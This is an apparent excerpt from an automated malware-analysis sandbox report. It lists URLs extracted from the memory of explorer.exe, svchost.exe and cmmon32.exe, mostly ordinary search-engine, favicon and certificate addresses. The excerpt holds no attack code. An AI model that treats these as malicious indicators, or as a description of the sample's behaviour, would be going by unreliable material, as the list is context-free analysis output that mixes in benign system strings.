Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: svchost.exe, 0000000C.00000002.7727688812.0000022382600000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 0000000C.00000000.7217036538.0000022382376000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: svchost.exe, 0000000C.00000000.7211611715.0000022381481000.00000004.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: svchost.exe, 0000000C.00000000.7217363445.0000022382400000.00000004.sdmpString found in binary or memory: http://passport.net/tb
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://price.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000005.00000000.6546938513.0000000006930000.00000002.sdmpString found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://udn.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000005.00000000.6546938513.0000000006930000.00000002.sdmpString found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000005.00000000.6520278973.0000000002B50000.00000002.sdmpString found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000005.00000000.6564773160.000000000E05A000.00000004.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6554200914.000000000A6A6000.00000002.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpCacLMEMp
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpPLMEMx
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpString found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: cmmon32.exe, 00000006.00000002.7697716554.00000000000DB000.00000004.sdmpString found in binary or memory: http://www.msn.com/ocid=iehp
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000005.00000000.6547828805.0000000006A23000.00000002.sdmpString found in binary or memory: http://www.najdi.si/
